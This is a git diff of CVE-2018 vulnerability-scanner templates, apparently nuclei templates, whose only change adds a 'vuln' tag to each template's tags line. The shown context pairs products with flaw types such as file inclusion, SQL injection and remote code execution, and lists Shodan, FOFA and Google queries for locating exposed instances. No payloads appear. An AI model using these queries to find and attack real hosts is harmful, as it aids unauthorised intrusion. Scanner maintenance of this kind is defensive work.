a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"kibana" fofa-query: title="kibana" google-query: intitle:"kibana" - tags: cve,cve2018,lfi,kibana,vulhub,elastic,vkev + tags: cve,cve2018,lfi,kibana,vulhub,elastic,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index 25eec85ea68..880df613f6f 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -27,7 +27,7 @@ info: vendor: arkextensions product: jck_editor framework: joomla\! - tags: cve,cve2018,packetstorm,edb,joomla,sqli,arkextensions,joomla\!,vkev + tags: cve,cve2018,packetstorm,edb,joomla,sqli,arkextensions,joomla\!,vkev,vuln variables: num: "999999999" diff --git a/http/cves/2018/CVE-2018-17283.yaml b/http/cves/2018/CVE-2018-17283.yaml index 466f313ea08..6b16474ff81 100644 --- a/http/cves/2018/CVE-2018-17283.yaml +++ b/http/cves/2018/CVE-2018-17283.yaml @@ -23,7 +23,7 @@ info: product: manageengine_opmanager shodan-query: http.title:"OpManager" fofa-query: title="OpManager" - tags: cve,cve2018,oputils,zoho,opmanager,sqli,time-based-sqli,vkev + tags: cve,cve2018,oputils,zoho,opmanager,sqli,time-based-sqli,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 2e990a35e96..120fda5bd96 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -32,7 +32,7 @@ info: - http.title:"dotcms" fofa-query: title="dotcms" google-query: intitle:"dotcms" - tags: cve2018,cve,redirect,dotcms + tags: cve2018,cve,redirect,dotcms,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index e77d2ea94a5..0e7fb07d38b 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: comodo product: unified_threat_management_firewall - tags: cve,cve2018,comodo,rce,edb,vkev + tags: cve,cve2018,comodo,rce,edb,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index 3c7391e1d8c..1cd42e63b26 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -28,7 +28,7 @@ info: vendor: wpml product: wpml framework: wordpress - tags: cve2018,cve,wordpress,xss,plugin,wpml + tags: cve2018,cve,wordpress,xss,plugin,wpml,vuln http: - method: POST diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index 44185307a75..eb1332c699a 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -31,7 +31,7 @@ info: shodan-query: - product:"Kubernetes" - product:"kubernetes" - tags: cve,cve2018,kubernetes,k8s,auth-bypass + tags: cve,cve2018,kubernetes,k8s,auth-bypass,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index 8344ed51df6..4db1788b6e7 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.title:"login | control webpanel" fofa-query: title="login | control webpanel" google-query: intitle:"login | control webpanel" - tags: cve2018,cve,centos,lfi,packetstorm,control-webpanel,xss + tags: cve2018,cve,centos,lfi,packetstorm,control-webpanel,xss,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-18325.yaml b/http/cves/2018/CVE-2018-18325.yaml index 5263337d3d6..5ad7682d06e 100644 --- a/http/cves/2018/CVE-2018-18325.yaml +++ b/http/cves/2018/CVE-2018-18325.yaml @@ -30,7 +30,7 @@ info: product: dotnetnuke fofa-query: app="dotnetnuke" verified: true - tags: cve,cve2018,dotnetnuke,crypto,deserialization,rce,kev,dnnsoftware,vkev + tags: cve,cve2018,dotnetnuke,crypto,deserialization,rce,kev,dnnsoftware,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index 184204d80e8..da3c4aed023 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: planonsoftware product: planon - tags: cve,cve2018,xss,planon,planonsoftware + tags: cve,cve2018,xss,planon,planonsoftware,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index 731efe543a4..9f8b0e72230 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -35,7 +35,7 @@ info: fofa-query: - body="dedecms" - app="dedecms" - tags: cve2018,cve,dedecms,xss + tags: cve2018,cve,dedecms,xss,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index 9f1790d826e..6ca80b48545 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: microstrategy product: microstrategy_web - tags: cve2018,cve,microstrategy,xss,edb,packetstorm,intrusive,vkev + tags: cve2018,cve,microstrategy,xss,edb,packetstorm,intrusive,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index 4cf2bcb214b..8843b9a0bc9 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: microstrategy product: microstrategy_web - tags: cve,cve2018,traversal,edb,packetstorm,microstrategy,lfi + tags: cve,cve2018,traversal,edb,packetstorm,microstrategy,lfi,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index 93d8b9a442c..73b58513104 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -31,7 +31,7 @@ info: - 'Server: mini_httpd && 200' - cpe:"cpe:2.3:a:acme:mini-httpd" - "server: mini_httpd && 200" - tags: cve,cve2018,lfi,mini_httpd,acme + tags: cve,cve2018,lfi,mini_httpd,acme,vuln flow: http(1) && http(2) diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index 2362bdedf2d..53777b02fd6 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -33,7 +33,7 @@ info: - html:"jasperserver-pro" - http.html:"jasperserver-pro" fofa-query: body="jasperserver-pro" - tags: cve2018,cve,packetstorm,seclists,lfi,kev,jasperserver,jasperreport,tibco,vkev + tags: cve2018,cve,packetstorm,seclists,lfi,kev,jasperserver,jasperreport,tibco,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index b0aa5d9e5cc..f6a86e86620 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -31,7 +31,7 @@ info: - http.title:"sign in - gogs" fofa-query: title="sign in - gogs" google-query: intitle:"sign in - gogs" - tags: cve,cve2018,gogs,lfi,rce,vulhub + tags: cve,cve2018,gogs,lfi,rce,vulhub,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-19127.yaml b/http/cves/2018/CVE-2018-19127.yaml index 61c735851a3..e644ae80a98 100644 --- a/http/cves/2018/CVE-2018-19127.yaml +++ b/http/cves/2018/CVE-2018-19127.yaml @@ -29,7 +29,7 @@ info: fofa-query: body="Powered by phpcms" vendor: phpcms product: phpcms-2008 - tags: cve,cve2018,phpcms,rce,ssti,vkev + tags: cve,cve2018,phpcms,rce,ssti,vkev,vuln flow: http(1) || http(2) diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index 53aef831cd7..513be771c78 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: domainmod product: domainmod - tags: cve2018,cve,edb,domainmod,xss,authenticated + tags: cve2018,cve,edb,domainmod,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index a976ad18d53..346428dfffd 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: domainmod product: domainmod - tags: cve,cve2018,domainmod,xss,authenticated + tags: cve,cve2018,domainmod,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-19207.yaml b/http/cves/2018/CVE-2018-19207.yaml index 0ac96aa8ce8..112c640e4f7 100644 --- a/http/cves/2018/CVE-2018-19207.yaml +++ b/http/cves/2018/CVE-2018-19207.yaml @@ -23,7 +23,7 @@ info: framework: wordpress publicwww-query: "wp-content/plugins/wp-gdpr-compliance/" verified: true - tags: cve,cve2018,wordpress,wp-plugin,wp-gdpr-compliance,rce,vkev + tags: cve,cve2018,wordpress,wp-plugin,wp-gdpr-compliance,rce,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-19276.yaml b/http/cves/2018/CVE-2018-19276.yaml index 8740786a0fb..ce71ad13782 100644 --- a/http/cves/2018/CVE-2018-19276.yaml +++ b/http/cves/2018/CVE-2018-19276.yaml @@ -24,7 +24,7 @@ info: vendor: openmrs product: openmrs shodan-query: html:"OpenMRS" - tags: cve,cve20218,openmrs,deserialization,rce,vkev + tags: cve,cve20218,openmrs,deserialization,rce,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index e598660075e..5e66c3f7903 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -33,7 +33,7 @@ info: shodan-query: http.html:/wp-content/plugins/ninja-forms/ fofa-query: body=/wp-content/plugins/ninja-forms/ publicwww-query: /wp-content/plugins/ninja-forms/ - tags: cve,cve2018,wp-plugin,wp,xss,authenticated,wpscan,edb,ninja-forms,wordpress,ninjaforma + tags: cve,cve2018,wp-plugin,wp,xss,authenticated,wpscan,edb,ninja-forms,wordpress,ninjaforma,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index 4cc1b7a2128..94479e94f61 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -33,7 +33,7 @@ info: - http.html:"VMG1312-B10D" - http.html:"vmg1312-b10d" fofa-query: body="vmg1312-b10d" - tags: cve2018,cve,lfi,modem,router,edb,zyxel + tags: cve2018,cve,lfi,modem,router,edb,zyxel,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index fdf873217a3..fcbf824799f 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -31,7 +31,7 @@ info: - cpe:"cpe:2.3:a:wowza:streaming_engine" fofa-query: title="manager" product:"wowza streaming engine" google-query: intitle:"manager" product:"wowza streaming engine" - tags: cve2018,cve,wowza,lfi,vkev + tags: cve2018,cve,wowza,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index ec017a2f832..b57771869f0 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: solarwinds product: database_performance_analyzer - tags: cve,cve2018,solarwinds,xss + tags: cve,cve2018,solarwinds,xss,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-19410.yaml b/http/cves/2018/CVE-2018-19410.yaml index 2ee8834643b..226e1b74a6e 100644 --- a/http/cves/2018/CVE-2018-19410.yaml +++ b/http/cves/2018/CVE-2018-19410.yaml @@ -27,7 +27,7 @@ info: - icon_hash=-655683626 - title="prtg" google-query: intitle:"prtg" - tags: cve,cve2018,prtg,lfi,kev,vkev + tags: cve,cve2018,prtg,lfi,kev,vkev,vuln variables: username: "{{rand_base(6)}}" diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml index aaca0f09e35..7a22b0c208f 100644 --- a/http/cves/2018/CVE-2018-19439.yaml +++ b/http/cves/2018/CVE-2018-19439.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: oracle product: secure_global_desktop - tags: cve,cve2018,oracle,xss,seclists,packetstorm + tags: cve,cve2018,oracle,xss,seclists,packetstorm,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-19458.yaml b/http/cves/2018/CVE-2018-19458.yaml index 3e6b8482e38..b0c5d98d25e 100644 --- a/http/cves/2018/CVE-2018-19458.yaml +++ b/http/cves/2018/CVE-2018-19458.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: php-proxy product: php-proxy - tags: cve,cve2018,edb,lfi,proxy,php-proxy + tags: cve,cve2018,edb,lfi,proxy,php-proxy,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-19749.yaml b/http/cves/2018/CVE-2018-19749.yaml index b6325323f51..3e0e39bd363 100644 --- a/http/cves/2018/CVE-2018-19749.yaml +++ b/http/cves/2018/CVE-2018-19749.yaml @@ -29,7 +29,7 @@ info: max-request: 3 vendor: domainmod product: domainmod - tags: cve2018,cve,domainmod,xss,authenticated,edb + tags: cve2018,cve,domainmod,xss,authenticated,edb,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-19751.yaml b/http/cves/2018/CVE-2018-19751.yaml index 58b5c51173d..ef1e2d489fd 100644 --- a/http/cves/2018/CVE-2018-19751.yaml +++ b/http/cves/2018/CVE-2018-19751.yaml @@ -28,7 +28,7 @@ info: max-request: 3 vendor: domainmod product: domainmod - tags: cve,cve2018,domainmod,xss,authenticated,edb + tags: cve,cve2018,domainmod,xss,authenticated,edb,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-19752.yaml b/http/cves/2018/CVE-2018-19752.yaml index a446d219287..8f615735663 100644 --- a/http/cves/2018/CVE-2018-19752.yaml +++ b/http/cves/2018/CVE-2018-19752.yaml @@ -28,7 +28,7 @@ info: max-request: 3 vendor: domainmod product: domainmod - tags: cve2018,cve,domainmod,xss,authenticated,edb + tags: cve2018,cve,domainmod,xss,authenticated,edb,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-19753.yaml b/http/cves/2018/CVE-2018-19753.yaml index 80b0eb28995..1a77277c98c 100644 --- a/http/cves/2018/CVE-2018-19753.yaml +++ b/http/cves/2018/CVE-2018-19753.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: oracle product: tarantella_enterprise - tags: cve,cve2018,packetstorm,seclists,tarantella,lfi,oracle + tags: cve,cve2018,packetstorm,seclists,tarantella,lfi,oracle,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-19877.yaml b/http/cves/2018/CVE-2018-19877.yaml index db980b0086c..edbafe5e7e8 100644 --- a/http/cves/2018/CVE-2018-19877.yaml +++ b/http/cves/2018/CVE-2018-19877.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: adiscon product: loganalyzer - tags: cve,cve2018,adiscon,xss,edb + tags: cve,cve2018,adiscon,xss,edb,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-19892.yaml b/http/cves/2018/CVE-2018-19892.yaml index 280fd348e24..25e2917f3fc 100644 --- a/http/cves/2018/CVE-2018-19892.yaml +++ b/http/cves/2018/CVE-2018-19892.yaml @@ -28,7 +28,7 @@ info: max-request: 3 vendor: domainmod product: domainmod - tags: cve2018,cve,domainmod,xss,authenticated,edb + tags: cve2018,cve,domainmod,xss,authenticated,edb,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-19914.yaml b/http/cves/2018/CVE-2018-19914.yaml index a804c12cfcd..44bcb4872a3 100644 --- a/http/cves/2018/CVE-2018-19914.yaml +++ b/http/cves/2018/CVE-2018-19914.yaml @@ -29,7 +29,7 @@ info: max-request: 3 vendor: domainmod product: domainmod - tags: cve2018,cve,domainmod,xss,authenticated,edb + tags: cve2018,cve,domainmod,xss,authenticated,edb,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-19915.yaml b/http/cves/2018/CVE-2018-19915.yaml index cea63a83166..ae2fdb5e862 100644 --- a/http/cves/2018/CVE-2018-19915.yaml +++ b/http/cves/2018/CVE-2018-19915.yaml @@ -29,7 +29,7 @@ info: max-request: 3 vendor: domainmod product: domainmod - tags: cve,cve2018,domainmod,xss,authenticated,edb + tags: cve,cve2018,domainmod,xss,authenticated,edb,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-20009.yaml b/http/cves/2018/CVE-2018-20009.yaml index e514aef4a98..9082f49e185 100644 --- a/http/cves/2018/CVE-2018-20009.yaml +++ b/http/cves/2018/CVE-2018-20009.yaml @@ -29,7 +29,7 @@ info: max-request: 3 vendor: domainmod product: domainmod - tags: cve,cve2018,domainmod,xss,authenticated,edb + tags: cve,cve2018,domainmod,xss,authenticated,edb,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-20010.yaml b/http/cves/2018/CVE-2018-20010.yaml index b043363e689..235eec08f3d 100644 --- a/http/cves/2018/CVE-2018-20010.yaml +++ b/http/cves/2018/CVE-2018-20010.yaml @@ -28,7 +28,7 @@ info: max-request: 3 vendor: domainmod product: domainmod - tags: cve,cve2018,domainmod,xss,authenticated,edb + tags: cve,cve2018,domainmod,xss,authenticated,edb,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-20011.yaml b/http/cves/2018/CVE-2018-20011.yaml index bccff75a422..81b110663f1 100644 --- a/http/cves/2018/CVE-2018-20011.yaml +++ b/http/cves/2018/CVE-2018-20011.yaml @@ -28,7 +28,7 @@ info: max-request: 3 vendor: domainmod product: domainmod - tags: cve2018,cve,domainmod,xss,authenticated,edb + tags: cve2018,cve,domainmod,xss,authenticated,edb,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-20062.yaml b/http/cves/2018/CVE-2018-20062.yaml index 364b6928186..afef5de4e0b 100644 --- a/http/cves/2018/CVE-2018-20062.yaml +++ b/http/cves/2018/CVE-2018-20062.yaml @@ -23,7 +23,7 @@ info: fofa-query: app="ThinkPHP" verified: true max-request: 1 - tags: cve,cve2018,kev,thinkphp,rce,vkev + tags: cve,cve2018,kev,thinkphp,rce,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-20462.yaml b/http/cves/2018/CVE-2018-20462.yaml index 78684c9d661..91e26235435 100644 --- a/http/cves/2018/CVE-2018-20462.yaml +++ b/http/cves/2018/CVE-2018-20462.yaml @@ -28,7 +28,7 @@ info: vendor: "jsmol2wp_project" product: jsmol2wp framework: wordpress - tags: cve2018,cve,wordpress,xss,wp-plugin,jsmol2wp_project + tags: cve2018,cve,wordpress,xss,wp-plugin,jsmol2wp_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2018/CVE-2018-20463.yaml b/http/cves/2018/CVE-2018-20463.yaml index b3b12b2b409..6700fcd6f4b 100644 --- a/http/cves/2018/CVE-2018-20463.yaml +++ b/http/cves/2018/CVE-2018-20463.yaml @@ -30,7 +30,7 @@ info: vendor: jsmol2wp_project product: jsmol2wp framework: wordpress - tags: cve,cve2018,wp,wp-plugin,wordpress,jsmol2wp,wpscan,traversal,jsmol2wp_project,vkev + tags: cve,cve2018,wp,wp-plugin,wordpress,jsmol2wp,wpscan,traversal,jsmol2wp_project,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-20470.yaml b/http/cves/2018/CVE-2018-20470.yaml index 82ba8d2c663..648ed4256c2 100644 --- a/http/cves/2018/CVE-2018-20470.yaml +++ b/http/cves/2018/CVE-2018-20470.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: sahipro product: sahi_pro - tags: cve2018,cve,lfi,packetstorm,sahipro,vkev + tags: cve2018,cve,lfi,packetstorm,sahipro,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-20526.yaml b/http/cves/2018/CVE-2018-20526.yaml index 8293df3156b..20eb6c869d6 100644 --- a/http/cves/2018/CVE-2018-20526.yaml +++ b/http/cves/2018/CVE-2018-20526.yaml @@ -34,7 +34,7 @@ info: google-query: - intitle:"Roxy file manager" - intitle:"roxy file manager" - tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb,roxyfileman,vkev + tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb,roxyfileman,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-20608.yaml b/http/cves/2018/CVE-2018-20608.yaml index 7b3d1a397a4..7c7a4915700 100644 --- a/http/cves/2018/CVE-2018-20608.yaml +++ b/http/cves/2018/CVE-2018-20608.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: txjia product: imcat - tags: cve2018,cve,imcat,phpinfo,config,txjia + tags: cve2018,cve,imcat,phpinfo,config,txjia,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml index be6c09f3778..8b3162a899e 100644 --- a/http/cves/2018/CVE-2018-20824.yaml +++ b/http/cves/2018/CVE-2018-20824.yaml @@ -32,7 +32,7 @@ info: - http.component:"atlassian jira" - http.component:"atlassian confluence" - cpe:"cpe:2.3:a:atlassian:jira" - tags: cve2018,cve,atlassian,jira,xss + tags: cve2018,cve,atlassian,jira,xss,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-20985.yaml b/http/cves/2018/CVE-2018-20985.yaml index 068fc6c9149..0041454379f 100644 --- a/http/cves/2018/CVE-2018-20985.yaml +++ b/http/cves/2018/CVE-2018-20985.yaml @@ -28,7 +28,7 @@ info: vendor: payeezy product: wp_payeezy_pay framework: wordpress - tags: cve,cve2018,wordpress,lfi,plugin,payeezy + tags: cve,cve2018,wordpress,lfi,plugin,payeezy,vuln http: - method: POST diff --git a/http/cves/2018/CVE-2018-2392.yaml b/http/cves/2018/CVE-2018-2392.yaml index 5209ab98884..2d0e91d71c9 100644 --- a/http/cves/2018/CVE-2018-2392.yaml +++ b/http/cves/2018/CVE-2018-2392.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: sap product: internet_graphics_server - tags: cve,cve2018,sap,igs,xxe,xmlchart,msf,intrusive,vkev + tags: cve,cve2018,sap,igs,xxe,xmlchart,msf,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-25114.yaml b/http/cves/2018/CVE-2018-25114.yaml index 09fde81def7..b9bb9c82005 100644 --- a/http/cves/2018/CVE-2018-25114.yaml +++ b/http/cves/2018/CVE-2018-25114.yaml @@ -20,7 +20,7 @@ info: metadata: verified: true max-request: 2 - tags: cve,cve2018,rce,oscommerce,edb + tags: cve,cve2018,rce,oscommerce,edb,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-2791.yaml b/http/cves/2018/CVE-2018-2791.yaml index 01a5a8aa9f9..2f23e8f3be5 100644 --- a/http/cves/2018/CVE-2018-2791.yaml +++ b/http/cves/2018/CVE-2018-2791.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: oracle product: webcenter_sites - tags: cve2018,cve,edb,oracle,xss,wcs + tags: cve2018,cve,edb,oracle,xss,wcs,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-2894.yaml b/http/cves/2018/CVE-2018-2894.yaml index 2d255fc04b2..02db05ee0b3 100644 --- a/http/cves/2018/CVE-2018-2894.yaml +++ b/http/cves/2018/CVE-2018-2894.yaml @@ -32,7 +32,7 @@ info: - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" - tags: cve2018,cve,oracle,weblogic,rce,vulhub,intrusive,vkev + tags: cve2018,cve,oracle,weblogic,rce,vulhub,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-3167.yaml b/http/cves/2018/CVE-2018-3167.yaml index 927bf0ed0c9..3392a2a2fdc 100644 --- a/http/cves/2018/CVE-2018-3167.yaml +++ b/http/cves/2018/CVE-2018-3167.yaml @@ -27,7 +27,7 @@ info: vendor: oracle product: application_management_pack framework: e-business_suite - tags: cve,cve2018,oracle,ebs,ssrf,blind,e-business_suite + tags: cve,cve2018,oracle,ebs,ssrf,blind,e-business_suite,vuln http: - method: POST diff --git a/http/cves/2018/CVE-2018-3238.yaml b/http/cves/2018/CVE-2018-3238.yaml index de3667e04f6..59d36729df6 100644 --- a/http/cves/2018/CVE-2018-3238.yaml +++ b/http/cves/2018/CVE-2018-3238.yaml @@ -26,7 +26,7 @@ info: max-request: 3 vendor: oracle product: webcenter_sites - tags: cve2018,cve,oracle,wcs,xss + tags: cve2018,cve,oracle,wcs,xss,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-3714.yaml b/http/cves/2018/CVE-2018-3714.yaml index 9aafce8ced1..76ced142112 100644 --- a/http/cves/2018/CVE-2018-3714.yaml +++ b/http/cves/2018/CVE-2018-3714.yaml @@ -28,7 +28,7 @@ info: vendor: node-srv_project product: node-srv framework: node.js - tags: cve,cve2018,nodejs,lfi,hackerone,node-srv_project,node.js + tags: cve,cve2018,nodejs,lfi,hackerone,node-srv_project,node.js,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-3760.yaml b/http/cves/2018/CVE-2018-3760.yaml index 2e63d01d7f5..129280146aa 100644 --- a/http/cves/2018/CVE-2018-3760.yaml +++ b/http/cves/2018/CVE-2018-3760.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: redhat product: cloudforms - tags: cve2018,cve,rails,lfi,ruby,vulhub,seclists,redhat,vkev + tags: cve2018,cve,rails,lfi,ruby,vulhub,seclists,redhat,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-3810.yaml b/http/cves/2018/CVE-2018-3810.yaml index 942de4ccb7a..1c1bb1907b1 100644 --- a/http/cves/2018/CVE-2018-3810.yaml +++ b/http/cves/2018/CVE-2018-3810.yaml @@ -28,7 +28,7 @@ info: vendor: oturia product: smart_google_code_inserter framework: wordpress - tags: cve,cve2018,wordpress,google,edb,oturia,vkev + tags: cve,cve2018,wordpress,google,edb,oturia,vkev,vuln http: - method: POST diff --git a/http/cves/2018/CVE-2018-5230.yaml b/http/cves/2018/CVE-2018-5230.yaml index 2ea301a61de..138c7f23ab8 100644 --- a/http/cves/2018/CVE-2018-5230.yaml +++ b/http/cves/2018/CVE-2018-5230.yaml @@ -33,7 +33,7 @@ info: - http.component:"atlassian jira" - http.component:"atlassian confluence" - cpe:"cpe:2.3:a:atlassian:jira" - tags: cve,cve2018,atlassian,confluence,xss + tags: cve,cve2018,atlassian,confluence,xss,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-5233.yaml b/http/cves/2018/CVE-2018-5233.yaml index 1c7fa037d3c..6279876ce6c 100644 --- a/http/cves/2018/CVE-2018-5233.yaml +++ b/http/cves/2018/CVE-2018-5233.yaml @@ -29,7 +29,7 @@ info: - html:"Grav CMS" - http.html:"grav cms" fofa-query: body="grav cms" - tags: cve,cve2018,xss,grav,getgrav + tags: cve,cve2018,xss,grav,getgrav,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-5316.yaml b/http/cves/2018/CVE-2018-5316.yaml index 2ea0507807f..2b52d07d577 100644 --- a/http/cves/2018/CVE-2018-5316.yaml +++ b/http/cves/2018/CVE-2018-5316.yaml @@ -29,7 +29,7 @@ info: vendor: patsatech product: sagepay_server_gateway_for_woocommerce framework: wordpress - tags: cve2018,cve,wordpress,xss,wp-plugin,wp,woocommerce,packetstorm,patsatech + tags: cve2018,cve,wordpress,xss,wp-plugin,wp,woocommerce,packetstorm,patsatech,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-5715.yaml b/http/cves/2018/CVE-2018-5715.yaml index f624dcfd353..26ed3b38f11 100644 --- a/http/cves/2018/CVE-2018-5715.yaml +++ b/http/cves/2018/CVE-2018-5715.yaml @@ -38,7 +38,7 @@ info: - intext:"SugarCRM Inc. All Rights Reserved" - intitle:sugarcrm - intext:"sugarcrm inc. all rights reserved" - tags: cve2018,cve,sugarcrm,xss,edb + tags: cve2018,cve,sugarcrm,xss,edb,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-6008.yaml b/http/cves/2018/CVE-2018-6008.yaml index cdd57f38d80..3eb4b37f4dc 100644 --- a/http/cves/2018/CVE-2018-6008.yaml +++ b/http/cves/2018/CVE-2018-6008.yaml @@ -28,7 +28,7 @@ info: vendor: joomlatag product: jtag_members_directory framework: joomla\! - tags: cve2018,cve,joomla,lfi,edb,packetstorm,joomlatag,joomla\! + tags: cve2018,cve,joomla,lfi,edb,packetstorm,joomlatag,joomla\!,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml index 9aa9325c91f..c2de1c134e9 100644 --- a/http/cves/2018/CVE-2018-6184.yaml +++ b/http/cves/2018/CVE-2018-6184.yaml @@ -33,7 +33,7 @@ info: - http.html:"/_next/static" - 